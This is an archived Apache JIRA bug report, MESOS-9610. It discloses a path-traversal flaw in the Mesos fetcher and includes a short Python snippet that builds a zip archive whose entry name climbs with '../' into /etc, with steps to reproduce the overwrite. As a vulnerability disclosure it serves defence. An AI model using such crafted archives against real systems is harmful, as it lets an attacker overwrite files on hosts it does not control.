You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@mesos.apache.org by "Mariusz Derela (JIRA)" <ji...@apache.org> on 2019/02/26 02:06:00 UTC
[jira] [Created] (MESOS-9610) Fetcher vulnerability - escaping from
sandbox
Mariusz Derela created MESOS-9610:
-------------------------------------
Summary: Fetcher vulnerability - escaping from sandbox
Key: MESOS-9610
URL: https://issues.apache.org/jira/browse/MESOS-9610
Project: Mesos
Issue Type: Bug
Components: fetcher
Affects Versions: 1.7.2
Reporter: Mariusz Derela
I have noticed that there is a possibility to exploit fetcher and overwrite any files on the agent host.
scenario to reproduce:
1) prepare a file with any content and name a file like "../../../etc/test". we can use python and zipfile module to achieve that:
{code:java}
>>> import zipfile
>>> zip = zipfile.ZipFile("exploit.zip", "w")
>>> zip.writestr("../../../../../../../../../../../../etc/mariusz_was_here.txt", "some content")
>>> zip.close()
{code}
2) prepare a service that will use our artifact (exploit.zip)
3) run service
at the end in /etc we will get our file. As you can imagine there is a lot possibility how we can use it.
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)